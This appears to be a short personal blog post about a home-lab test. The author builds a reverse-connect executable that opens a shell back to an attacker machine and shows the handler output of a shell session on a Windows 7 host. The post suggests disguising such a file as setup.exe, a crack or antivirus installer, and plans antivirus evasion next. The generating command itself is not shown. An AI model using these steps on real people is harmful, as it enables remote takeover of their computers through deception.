My first shot at this was sort of a "hello world" in my own network just to see it work, so I built a reverse connect binary called exploitme.exe using the following command:
That basically says "when someone runs exploitme.exe, connect back to 192.168.168.13 on port 4444 and serve up a shell as the user that executed the exploit". I put that .exe on a local web-server so I could grab it on a windows box later.
Then on the attacker machine (.13) the same code essentially used as a handler, which just sort of hangs out and waits for the exploited machine to call home:
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:4444
So this, all by its self was way too easy... I hop on a windows7 machine and download exploitme.exe (of-course, if this were really an attempt to attack someone, better names include: setup.exe, crack.exe, avg_free.exe, limewirepro.exe, etc...). Anyway, once the executable is downloaded, and the user tries to run it, nothing seems to happen on their end (no real program is there in this version, just the exploit) and the waiting handler on the attackers machine is greeted with this:
[*] Starting the payload handler...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.168.13:4444 -> 192.168.168.24:51166)
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files\Mozilla Firefox>
...awesome.
In the future I'll have a look at anti-virus evasion and more entertaining payloads than just a simple shell.
0 comments:
Post a Comment